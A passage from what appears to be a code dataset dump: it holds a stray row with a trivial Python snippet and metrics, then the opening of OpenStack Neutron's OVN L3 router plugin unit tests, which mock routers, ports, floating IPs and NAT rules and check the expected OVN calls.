] | 1 | 2019-11-05T03:03:14.000Z | 2019-11-05T03:03:14.000Z | def func():
return 1
def func2():
return 1
__transonic__ = ("0.3.0",)
| 8.2 | 26 | 0.54878 | 12 | 82 | 3.416667 | 0.666667 | 0.341463 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101695 | 0.280488 | 82 | 9 | 27 | 9.111111 | 0.59322 | 0 | 0 | 0.4 | 0 | 0 | 0.060976 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.4 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
ed5030f823aceb7a09b2a0cb64a3f23db44d69e7 | 83,760 | py | Python | neutron/tests/unit/services/ovn_l3/test_plugin.py | huiweics/neutron | 8c7ca776d8cbe967a8bbe773ab38c361414a7068 | [
"Apache-2.0"
] | null | null | null | neutron/tests/unit/services/ovn_l3/test_plugin.py | huiweics/neutron | 8c7ca776d8cbe967a8bbe773ab38c361414a7068 | [
"Apache-2.0"
] | null | null | null | neutron/tests/unit/services/ovn_l3/test_plugin.py | huiweics/neutron | 8c7ca776d8cbe967a8bbe773ab38c361414a7068 | [
"Apache-2.0"
] | null | null | null | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import copy
import mock
from neutron_lib.api.definitions import external_net
from neutron_lib.api.definitions import portbindings
from neutron_lib.api.definitions import provider_net as pnet
from neutron_lib.callbacks import events
from neutron_lib.callbacks import resources
from neutron_lib import constants
from neutron_lib import exceptions as n_exc
from neutron_lib.plugins import constants as plugin_constants
from neutron_lib.plugins import directory
from oslo_config import cfg
from oslo_utils import uuidutils
from neutron.common.ovn import constants as ovn_const
from neutron.common.ovn import utils
from neutron.conf.plugins.ml2.drivers.ovn import ovn_conf as config
from neutron.services.revisions import revision_plugin
from neutron.tests.unit.api import test_extensions
from neutron.tests.unit.extensions import test_extraroute
from neutron.tests.unit.extensions import test_l3
from neutron.tests.unit.extensions import test_l3_ext_gw_mode as test_l3_gw
from neutron.tests.unit import fake_resources
from neutron.tests.unit.plugins.ml2 import test_plugin as test_mech_driver
# TODO(mjozefcz): Find out a way to not inherit from
# Ml2PluginV2TestCase.
class TestOVNL3RouterPlugin(test_mech_driver.Ml2PluginV2TestCase):
l3_plugin = 'neutron.services.ovn_l3.plugin.OVNL3RouterPlugin'
def _start_mock(self, path, return_value, new_callable=None):
patcher = mock.patch(path, return_value=return_value,
new_callable=new_callable)
patch = patcher.start()
self.addCleanup(patcher.stop)
return patch
def setUp(self):
super(TestOVNL3RouterPlugin, self).setUp()
revision_plugin.RevisionPlugin()
network_attrs = {external_net.EXTERNAL: True, 'mtu': 1500}
self.fake_network = \
fake_resources.FakeNetwork.create_one_network(
attrs=network_attrs).info()
self.fake_router_port = {'device_id': '',
'network_id': self.fake_network['id'],
'device_owner': 'network:router_interface',
'mac_address': 'aa:aa:aa:aa:aa:aa',
'status': constants.PORT_STATUS_ACTIVE,
'fixed_ips': [{'ip_address': '10.0.0.100',
'subnet_id': 'subnet-id'}],
'id': 'router-port-id'}
self.fake_router_port_assert = {
'lrouter': 'neutron-router-id',
'mac': 'aa:aa:aa:aa:aa:aa',
'name': 'lrp-router-port-id',
'may_exist': True,
'networks': ['10.0.0.100/24'],
'options': {},
'external_ids': {
ovn_const.OVN_SUBNET_EXT_IDS_KEY: 'subnet-id',
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_NETWORK_NAME_EXT_ID_KEY:
utils.ovn_name(self.fake_network['id'])}}
self.fake_router_ports = [self.fake_router_port]
self.fake_subnet = {'id': 'subnet-id',
'ip_version': 4,
'cidr': '10.0.0.0/24'}
self.fake_router = {'id': 'router-id',
'name': 'router',
'admin_state_up': False,
'routes': [{'destination': '1.1.1.0/24',
'nexthop': '10.0.0.2'}]}
self.fake_router_interface_info = {
'port_id': 'router-port-id',
'device_id': '',
'mac_address': 'aa:aa:aa:aa:aa:aa',
'subnet_id': 'subnet-id',
'subnet_ids': ['subnet-id'],
'fixed_ips': [{'ip_address': '10.0.0.100',
'subnet_id': 'subnet-id'}],
'id': 'router-port-id'}
self.fake_external_fixed_ips = {
'network_id': 'ext-network-id',
'external_fixed_ips': [{'ip_address': '192.168.1.1',
'subnet_id': 'ext-subnet-id'}]}
self.fake_router_with_ext_gw = {
'id': 'router-id',
'name': 'router',
'admin_state_up': True,
'external_gateway_info': self.fake_external_fixed_ips,
'gw_port_id': 'gw-port-id'
}
self.fake_router_without_ext_gw = {
'id': 'router-id',
'name': 'router',
'admin_state_up': True,
}
self.fake_ext_subnet = {'id': 'ext-subnet-id',
'ip_version': 4,
'cidr': '192.168.1.0/24',
'gateway_ip': '192.168.1.254'}
self.fake_ext_gw_port = {'device_id': '',
'device_owner': 'network:router_gateway',
'fixed_ips': [{'ip_address': '192.168.1.1',
'subnet_id': 'ext-subnet-id'}],
'mac_address': '00:00:00:02:04:06',
'network_id': self.fake_network['id'],
'id': 'gw-port-id'}
self.fake_ext_gw_port_assert = {
'lrouter': 'neutron-router-id',
'mac': '00:00:00:02:04:06',
'name': 'lrp-gw-port-id',
'networks': ['192.168.1.1/24'],
'may_exist': True,
'external_ids': {
ovn_const.OVN_SUBNET_EXT_IDS_KEY: 'ext-subnet-id',
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_NETWORK_NAME_EXT_ID_KEY:
utils.ovn_name(self.fake_network['id'])},
'gateway_chassis': ['hv1'],
'options': {}}
self.fake_floating_ip_attrs = {'floating_ip_address': '192.168.0.10',
'fixed_ip_address': '10.0.0.10'}
self.fake_floating_ip = fake_resources.FakeFloatingIp.create_one_fip(
attrs=self.fake_floating_ip_attrs)
self.fake_floating_ip_new_attrs = {
'router_id': 'new-router-id',
'floating_ip_address': '192.168.0.10',
'fixed_ip_address': '10.10.10.10',
'port_id': 'new-port_id'}
self.fake_floating_ip_new = (
fake_resources.FakeFloatingIp.create_one_fip(
attrs=self.fake_floating_ip_new_attrs))
self.fake_ovn_nat_rule = (
fake_resources.FakeOvsdbRow.create_one_ovsdb_row({
'logical_ip': self.fake_floating_ip['fixed_ip_address'],
'external_ip': self.fake_floating_ip['floating_ip_address'],
'type': 'dnat_and_snat',
'external_ids': {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip['id'],
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip['router_id'])}}))
self.l3_inst = directory.get_plugin(plugin_constants.L3)
self.lb_id = uuidutils.generate_uuid()
self.member_subnet = {'id': 'subnet-id',
'ip_version': 4,
'cidr': '10.0.0.0/24',
'network_id': self.fake_network['id']}
self.member_id = uuidutils.generate_uuid()
self.member_port_id = uuidutils.generate_uuid()
self.member_address = '10.0.0.10'
self.member_l4_port = '80'
self.member_port = {
'network_id': self.fake_network['id'],
'mac_address': 'aa:aa:aa:aa:aa:aa',
'fixed_ips': [{'ip_address': self.member_address,
'subnet_id': self.member_subnet['id']}],
'id': 'fake-port-id'}
self.member_lsp = fake_resources.FakeOvsdbRow.create_one_ovsdb_row(
attrs={
'addresses': ['10.0.0.10 ff:ff:ff:ff:ff:ff'],
'uuid': self.member_port['id']})
self.listener_id = uuidutils.generate_uuid()
self.pool_id = uuidutils.generate_uuid()
self.ovn_lb = mock.MagicMock()
self.ovn_lb.protocol = ['tcp']
self.ovn_lb.uuid = uuidutils.generate_uuid()
self.member_line = (
'member_%s_%s:%s_%s' %
(self.member_id, self.member_address,
self.member_l4_port, self.member_subnet['id']))
self.ovn_lb.external_ids = {
ovn_const.LB_EXT_IDS_VIP_KEY: '10.22.33.4',
ovn_const.LB_EXT_IDS_VIP_FIP_KEY: '123.123.123.123',
ovn_const.LB_EXT_IDS_VIP_PORT_ID_KEY: 'foo_port',
'enabled': True,
'pool_%s' % self.pool_id: self.member_line,
'listener_%s' % self.listener_id: '80:pool_%s' % self.pool_id}
self.lb_vip_lsp = fake_resources.FakeOvsdbRow.create_one_ovsdb_row(
attrs={'external_ids': {ovn_const.OVN_PORT_NAME_EXT_ID_KEY:
'%s%s' % (ovn_const.LB_VIP_PORT_PREFIX,
self.ovn_lb.uuid)},
'name': uuidutils.generate_uuid(),
'addresses': ['10.0.0.100 ff:ff:ff:ff:ff:ee'],
'uuid': uuidutils.generate_uuid()})
self.lb_network = fake_resources.FakeOvsdbRow.create_one_ovsdb_row(
attrs={'load_balancer': [self.ovn_lb],
'name': 'neutron-%s' % self.fake_network['id'],
'ports': [self.lb_vip_lsp, self.member_lsp],
'uuid': self.fake_network['id']})
self.nb_idl = self._start_mock(
'neutron.services.ovn_l3.plugin.OVNL3RouterPlugin._ovn',
new_callable=mock.PropertyMock,
return_value=fake_resources.FakeOvsdbNbOvnIdl())
self.sb_idl = self._start_mock(
'neutron.services.ovn_l3.plugin.OVNL3RouterPlugin._sb_ovn',
new_callable=mock.PropertyMock,
return_value=fake_resources.FakeOvsdbSbOvnIdl())
self._start_mock(
'neutron.plugins.ml2.plugin.Ml2Plugin.get_network',
return_value=self.fake_network)
self._start_mock(
'neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port',
return_value=self.fake_router_port)
self._start_mock(
'neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet',
return_value=self.fake_subnet)
self._start_mock(
'neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router',
return_value=self.fake_router)
self._start_mock(
'neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.update_router',
return_value=self.fake_router)
self._start_mock(
'neutron.db.l3_db.L3_NAT_dbonly_mixin.remove_router_interface',
return_value=self.fake_router_interface_info)
self._start_mock(
'neutron.db.l3_db.L3_NAT_dbonly_mixin.create_router',
return_value=self.fake_router_with_ext_gw)
self._start_mock(
'neutron.db.l3_db.L3_NAT_dbonly_mixin.delete_router',
return_value={})
self.mock_candidates = self._start_mock(
'neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client.'
'OVNClient.get_candidates_for_scheduling',
return_value=[])
self.mock_schedule = self._start_mock(
'neutron.scheduler.l3_ovn_scheduler.'
'OVNGatewayLeastLoadedScheduler._schedule_gateway',
return_value=['hv1'])
# FIXME(lucasagomes): We shouldn't be mocking the creation of
# floating IPs here, that makes the FIP to not be registered in
# the standardattributes table and therefore we also need to mock
# bump_revision.
self._start_mock(
'neutron.db.l3_db.L3_NAT_dbonly_mixin.create_floatingip',
return_value=self.fake_floating_ip)
self._start_mock(
'neutron.db.ovn_revision_numbers_db.bump_revision',
return_value=None)
self._start_mock(
'neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip',
return_value=self.fake_floating_ip)
self._start_mock(
'neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client.'
'OVNClient.update_floatingip_status',
return_value=None)
self.bump_rev_p = self._start_mock(
'neutron.db.ovn_revision_numbers_db.bump_revision',
return_value=None)
self.del_rev_p = self._start_mock(
'neutron.db.ovn_revision_numbers_db.delete_revision',
return_value=None)
self.get_rev_p = self._start_mock(
'neutron.common.ovn.utils.get_revision_number',
return_value=1)
self.admin_context = mock.Mock()
self.get_a_ctx_mock_p = mock.patch(
'neutron_lib.context.get_admin_context',
return_value=self.admin_context)
self.addCleanup(self.get_a_ctx_mock_p.stop)
self.get_a_ctx_mock_p.start()
self.mock_is_lb_member_fip = mock.patch(
'neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._is_lb_member_fip',
return_value=False)
self.mock_is_lb_member_fip.start()
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.add_router_interface')
def test_add_router_interface(self, func):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
func.return_value = self.fake_router_interface_info
self.l3_inst.add_router_interface(self.context, router_id,
interface_info)
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_router_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'router-port-id', 'lrp-router-port-id', is_gw_port=False,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.bump_rev_p.assert_called_once_with(
self.admin_context, self.fake_router_port,
ovn_const.TYPE_ROUTER_PORTS)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.add_router_interface')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
def test_add_router_interface_update_lrouter_port(self, getp, func):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
func.return_value = {'id': router_id,
'port_id': 'router-port-id',
'subnet_id': 'subnet-id1',
'subnet_ids': ['subnet-id1'],
'fixed_ips': [
{'ip_address': '2001:db8::1',
'subnet_id': 'subnet-id1'},
{'ip_address': '2001:dba::1',
'subnet_id': 'subnet-id2'}],
'mac_address': 'aa:aa:aa:aa:aa:aa'
}
getp.return_value = {
'id': 'router-port-id',
'fixed_ips': [
{'ip_address': '2001:db8::1', 'subnet_id': 'subnet-id1'},
{'ip_address': '2001:dba::1', 'subnet_id': 'subnet-id2'}],
'mac_address': 'aa:aa:aa:aa:aa:aa',
'network_id': 'network-id1'}
fake_rtr_intf_networks = ['2001:db8::1/24', '2001:dba::1/24']
self.l3_inst.add_router_interface(self.context, router_id,
interface_info)
called_args_dict = (
self.l3_inst._ovn.update_lrouter_port.call_args_list[0][1])
self.assertEqual(1, self.l3_inst._ovn.update_lrouter_port.call_count)
self.assertItemsEqual(fake_rtr_intf_networks,
called_args_dict.get('networks', []))
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'router-port-id', 'lrp-router-port-id', is_gw_port=False,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
def test_remove_router_interface(self, getp):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
getp.side_effect = n_exc.PortNotFound(port_id='router-port-id')
self.l3_inst.remove_router_interface(
self.context, router_id, interface_info)
self.l3_inst._ovn.lrp_del.assert_called_once_with(
'lrp-router-port-id', 'neutron-router-id', if_exists=True)
self.del_rev_p.assert_called_once_with(
self.context, 'router-port-id', ovn_const.TYPE_ROUTER_PORTS)
def test_remove_router_interface_update_lrouter_port(self):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
self.l3_inst.remove_router_interface(
self.context, router_id, interface_info)
self.l3_inst._ovn.update_lrouter_port.assert_called_once_with(
if_exists=False, name='lrp-router-port-id',
ipv6_ra_configs={},
networks=['10.0.0.100/24'],
options={},
external_ids={
ovn_const.OVN_SUBNET_EXT_IDS_KEY: 'subnet-id',
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_NETWORK_NAME_EXT_ID_KEY:
utils.ovn_name(self.fake_network['id'])})
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb'
'.ovn_client.OVNClient._get_v4_network_of_all_router_ports')
def test_update_router_admin_state_change(self, get_rps, get_r, func):
router_id = 'router-id'
get_r.return_value = self.fake_router
new_router = self.fake_router.copy()
updated_data = {'admin_state_up': True}
new_router.update(updated_data)
func.return_value = new_router
self.l3_inst.update_router(self.context, router_id,
{'router': updated_data})
self.l3_inst._ovn.update_lrouter.assert_called_once_with(
'neutron-router-id', enabled=True, external_ids={
ovn_const.OVN_GW_PORT_EXT_ID_KEY: '',
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: 'router'})
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_v4_network_of_all_router_ports')
def test_update_router_name_change(self, get_rps, get_r, func):
router_id = 'router-id'
get_r.return_value = self.fake_router
new_router = self.fake_router.copy()
updated_data = {'name': 'test'}
new_router.update(updated_data)
func.return_value = new_router
self.l3_inst.update_router(self.context, router_id,
{'router': updated_data})
self.l3_inst._ovn.update_lrouter.assert_called_once_with(
'neutron-router-id', enabled=False,
external_ids={ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: 'test',
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_GW_PORT_EXT_ID_KEY: ''})
@mock.patch.object(utils, 'get_lrouter_non_gw_routes')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_router')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb'
'.ovn_client.OVNClient._get_v4_network_of_all_router_ports')
def test_update_router_static_route_no_change(self, get_rps, get_r, func,
mock_routes):
router_id = 'router-id'
get_rps.return_value = [{'device_id': '',
'device_owner': 'network:router_interface',
'mac_address': 'aa:aa:aa:aa:aa:aa',
'fixed_ips': [{'ip_address': '10.0.0.100',
'subnet_id': 'subnet-id'}],
'id': 'router-port-id'}]
mock_routes.return_value = self.fake_router['routes']
update_data = {'router': {'routes': [{'destination': '1.1.1.0/24',
'nexthop': '10.0.0.2'}]}}
self.l3_inst.update_router(self.context, router_id, update_data)
self.assertFalse(self.l3_inst._ovn.add_static_route.called)
self.assertFalse(self.l3_inst._ovn.delete_static_route.called)
@mock.patch.object(utils, 'get_lrouter_non_gw_routes')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_v4_network_of_all_router_ports')
def test_update_router_static_route_change(self, get_rps, get_r, func,
mock_routes):
router_id = 'router-id'
get_rps.return_value = [{'device_id': '',
'device_owner': 'network:router_interface',
'mac_address': 'aa:aa:aa:aa:aa:aa',
'fixed_ips': [{'ip_address': '10.0.0.100',
'subnet_id': 'subnet-id'}],
'id': 'router-port-id'}]
mock_routes.return_value = self.fake_router['routes']
get_r.return_value = self.fake_router
new_router = self.fake_router.copy()
updated_data = {'routes': [{'destination': '2.2.2.0/24',
'nexthop': '10.0.0.3'}]}
new_router.update(updated_data)
func.return_value = new_router
self.l3_inst.update_router(self.context, router_id,
{'router': updated_data})
self.l3_inst._ovn.add_static_route.assert_called_once_with(
'neutron-router-id',
ip_prefix='2.2.2.0/24', nexthop='10.0.0.3')
self.l3_inst._ovn.delete_static_route.assert_called_once_with(
'neutron-router-id',
ip_prefix='1.1.1.0/24', nexthop='10.0.0.2')
@mock.patch.object(utils, 'get_lrouter_non_gw_routes')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_v4_network_of_all_router_ports')
def test_update_router_static_route_clear(self, get_rps, get_r, func,
mock_routes):
router_id = 'router-id'
get_rps.return_value = [{'device_id': '',
'device_owner': 'network:router_interface',
'mac_address': 'aa:aa:aa:aa:aa:aa',
'fixed_ips': [{'ip_address': '10.0.0.100',
'subnet_id': 'subnet-id'}],
'id': 'router-port-id'}]
mock_routes.return_value = self.fake_router['routes']
get_r.return_value = self.fake_router
new_router = self.fake_router.copy()
updated_data = {'routes': []}
new_router.update(updated_data)
func.return_value = new_router
self.l3_inst.update_router(self.context, router_id,
{'router': updated_data})
self.l3_inst._ovn.add_static_route.assert_not_called()
self.l3_inst._ovn.delete_static_route.assert_called_once_with(
'neutron-router-id',
ip_prefix='1.1.1.0/24', nexthop='10.0.0.2')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_v4_network_of_all_router_ports')
def test_create_router_with_ext_gw(self, get_rps, get_subnet, get_port):
self.l3_inst._ovn.is_col_present.return_value = True
router = {'router': {'name': 'router'}}
get_subnet.return_value = self.fake_ext_subnet
get_port.return_value = self.fake_ext_gw_port
get_rps.return_value = self.fake_ext_subnet['cidr']
self.l3_inst.create_router(self.context, router)
external_ids = {ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: 'router',
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_GW_PORT_EXT_ID_KEY: 'gw-port-id'}
self.l3_inst._ovn.create_lrouter.assert_called_once_with(
'neutron-router-id', external_ids=external_ids,
enabled=True, options={})
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_ext_gw_port_assert)
expected_calls = [
mock.call('neutron-router-id', ip_prefix='0.0.0.0/0',
nexthop='192.168.1.254',
external_ids={
ovn_const.OVN_ROUTER_IS_EXT_GW: 'true',
ovn_const.OVN_SUBNET_EXT_ID_KEY: 'ext-subnet-id'})]
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'gw-port-id', 'lrp-gw-port-id', is_gw_port=True,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_static_route.assert_has_calls(expected_calls)
bump_rev_calls = [mock.call(self.admin_context, self.fake_ext_gw_port,
ovn_const.TYPE_ROUTER_PORTS),
mock.call(self.admin_context,
self.fake_router_with_ext_gw,
ovn_const.TYPE_ROUTERS),
]
self.assertEqual(len(bump_rev_calls), self.bump_rev_p.call_count)
self.bump_rev_p.assert_has_calls(bump_rev_calls, any_order=False)
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
def test_delete_router_with_ext_gw(self, gs, gr, gprs):
gr.return_value = self.fake_router_with_ext_gw
gs.return_value = self.fake_ext_subnet
self.l3_inst.delete_router(self.context, 'router-id')
self.l3_inst._ovn.delete_lrouter.assert_called_once_with(
'neutron-router-id')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.add_router_interface')
def test_add_router_interface_with_gateway_set(self, ari, gr, grps,
gs, gp):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
ari.return_value = self.fake_router_interface_info
gr.return_value = self.fake_router_with_ext_gw
gs.return_value = self.fake_subnet
gp.return_value = self.fake_router_port
self.l3_inst.add_router_interface(self.context, router_id,
interface_info)
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_router_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'router-port-id', 'lrp-router-port-id', is_gw_port=False,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1', type='snat')
self.bump_rev_p.assert_called_with(
self.admin_context, self.fake_router_port,
ovn_const.TYPE_ROUTER_PORTS)
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.add_router_interface')
def test_add_router_interface_with_gateway_set_and_snat_disabled(
self, ari, gr, grps, gs, gp):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
ari.return_value = self.fake_router_interface_info
gr.return_value = self.fake_router_with_ext_gw
gr.return_value['external_gateway_info']['enable_snat'] = False
gs.return_value = self.fake_subnet
gp.return_value = self.fake_router_port
self.l3_inst.add_router_interface(self.context, router_id,
interface_info)
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_router_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'router-port-id', 'lrp-router-port-id', is_gw_port=False,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_not_called()
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_network')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.add_router_interface')
def test_add_router_interface_vlan_network(self, ari, gr, grps, gs,
gp, gn):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
ari.return_value = self.fake_router_interface_info
gr.return_value = self.fake_router_with_ext_gw
gs.return_value = self.fake_subnet
gp.return_value = self.fake_router_port
# Set the type to be VLAN
fake_network_vlan = self.fake_network
fake_network_vlan[pnet.NETWORK_TYPE] = constants.TYPE_VLAN
gn.return_value = fake_network_vlan
self.l3_inst.add_router_interface(self.context, router_id,
interface_info)
# Make sure that the "reside-on-redirect-chassis" option was
# set to the new router port
fake_router_port_assert = self.fake_router_port_assert
fake_router_port_assert['options'] = {
'reside-on-redirect-chassis': 'true'}
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**fake_router_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'router-port-id', 'lrp-router-port-id', is_gw_port=False,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1', type='snat')
self.bump_rev_p.assert_called_with(
self.admin_context, self.fake_router_port,
ovn_const.TYPE_ROUTER_PORTS)
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_remove_router_interface_with_gateway_set(self, gr, gs, gp):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id',
'subnet_id': 'subnet-id'}
gr.return_value = self.fake_router_with_ext_gw
gs.return_value = self.fake_subnet
gp.side_effect = n_exc.PortNotFound(port_id='router-port-id')
self.l3_inst.remove_router_interface(
self.context, router_id, interface_info)
self.l3_inst._ovn.lrp_del.assert_called_once_with(
'lrp-router-port-id', 'neutron-router-id', if_exists=True)
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1', type='snat')
self.del_rev_p.assert_called_with(
self.context, 'router-port-id', ovn_const.TYPE_ROUTER_PORTS)
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_update_router_with_ext_gw(self, gr, ur, gs, grps, gp):
self.l3_inst._ovn.is_col_present.return_value = True
router = {'router': {'name': 'router'}}
gr.return_value = self.fake_router_without_ext_gw
ur.return_value = self.fake_router_with_ext_gw
gs.side_effect = lambda ctx, sid: {
'ext-subnet-id': self.fake_ext_subnet}.get(sid, self.fake_subnet)
gp.return_value = self.fake_ext_gw_port
grps.return_value = self.fake_router_ports
self.l3_inst.update_router(self.context, 'router-id', router)
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_ext_gw_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
